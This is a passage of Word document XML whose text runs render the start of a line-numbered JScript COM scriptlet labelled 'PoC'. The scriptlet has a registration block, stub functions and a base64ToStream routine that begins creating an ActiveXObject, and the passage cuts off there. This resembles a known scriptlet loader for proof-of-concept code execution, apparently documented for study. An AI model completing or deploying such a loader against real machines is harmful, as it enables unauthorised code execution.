          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="101"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>registration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>progid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"PoC"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="3710" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>classid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"{F0001111‐0000‐0000‐0000‐0000FEEDACDC}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"JScript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8632" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
